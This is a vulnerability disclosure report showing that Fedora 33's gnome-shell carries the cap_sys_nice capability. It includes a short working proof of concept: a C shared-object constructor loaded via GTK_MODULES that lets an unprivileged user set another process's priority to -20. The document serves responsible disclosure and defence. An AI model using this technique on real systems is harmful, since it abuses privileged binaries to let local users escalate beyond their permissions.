Fedora / Gnome fscaps Issue

`fedora: gnome not using fscaps safely  
  
I happened to notice a minor issue while working a tool I'm writing, I'm not sure if gnome or the fedora package is to blame, but it seems gnome-shell is now given cap_sys_nice:  
  
$ rpm -qf /bin/gnome-shell  
gnome-shell-3.38.4-1.fc33.x86_64  
$ getcap /bin/gnome-shell  
/bin/gnome-shell cap_sys_nice=ep  
  
This seems incorrect. Here is a demo, I'm just a regular user, and this pid has a priority of 0:  
  
$ ps -heo nice -q 495980  
0  
  
I don't have permission to raise that:  
  
$ renice -n -20 495980  
renice: failed to set priority for 495980 (process ID): Permission denied   
  
But it doesn't matter, I can just make gnome do it:  
  
$ cat prio.c  
#include <unistd.h>  
#include <sys/time.h>  
#include <sys/resource.h>  
  
void __attribute__((constructor)) init()  
{  
setpriority(PRIO_PROCESS, 495980, -20);  
_exit(0);  
}  
$ gcc -fPIC -shared -o prio.so prio.c  
$ env GTK_MODULES=/proc/self/cwd/prio.so /bin/gnome-shell --list-modes  
  
And if I look at the priority now...  
  
$ ps -heo nice -q 495980  
-20  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse,  
the bug report will become visible to the public. The scheduled disclosure  
date is YYYY-MM-DD. Disclosure at an earlier date is possible if  
agreed upon by all parties.  
  
  
  
  
  
Found by: [email protected]  
  
`